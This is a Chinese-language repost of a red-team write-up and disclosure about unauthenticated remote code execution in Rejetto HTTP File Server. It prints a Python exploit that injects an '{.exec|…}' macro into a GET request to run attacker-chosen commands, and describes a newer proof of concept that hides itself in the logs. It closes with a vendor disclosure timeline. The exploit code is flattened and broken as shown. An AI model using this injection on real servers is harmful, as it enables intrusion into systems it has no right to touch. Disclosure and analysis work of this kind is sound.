Rejetto HTTP 文件服务器
在红队评估期间,我偶然发现了一个神秘的网络应用程序:
以下是我在 80/tcp 端口遇到的情况
该网络应用程序被确认为 Rejetto HFS,这是一个曾经流行的 Windows 网络服务器,于 2002 年 8 月首次发布。
通过快速在线搜索,我发现 2.3m 版本没有已知漏洞。然而,我惊讶地发现旧版本有大量 RCE!
import socketurl = raw_input("Enter URL : ")try:while True:sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)sock.connect((url, 80))cmd = raw_input("Enter command (E.g. calc) or press Ctrl+C to exit : ")req = "GET /?{.exec|"+cmd+".}"req += " HTTP/1.1rnrn"sock.send(req)sock.close()print "Done!"except KeyboardInterrupt:print "Bye!"
我决定发布删节版的截图
这有点困难,但最终我创建了一个 POC,它不仅可以执行代码,还可以返回输出并将自身隐藏在日志文件中(通过空字节)。请注意,Host 标头的值也被篡改了,这对于注入至关重要。
报告
我很遗憾地得知 Rejetto HTTP File Server 2.x 现已过时且不再受支持。在与 Massimo Melina 讨论后,我们得出结论,我们应该建议所有用户更新到 HFS 3。
时间线
18/08/2023 — Reported to the vendor
21/08/2023 — Reply received
24/05/2024 — Vendor informed about disclosure
24/05/2024 — Reply received
25/05/2024 — Article released
25/05/2024 — CVE Request 1671764
Rejetto HTTP File Server2.3m Unauthenticated RCEhttps://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/
原文始发于微信公众号(Ots安全):Rejetto HTTP 文件服务器 2.3m 未经身份验证的 RCE
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论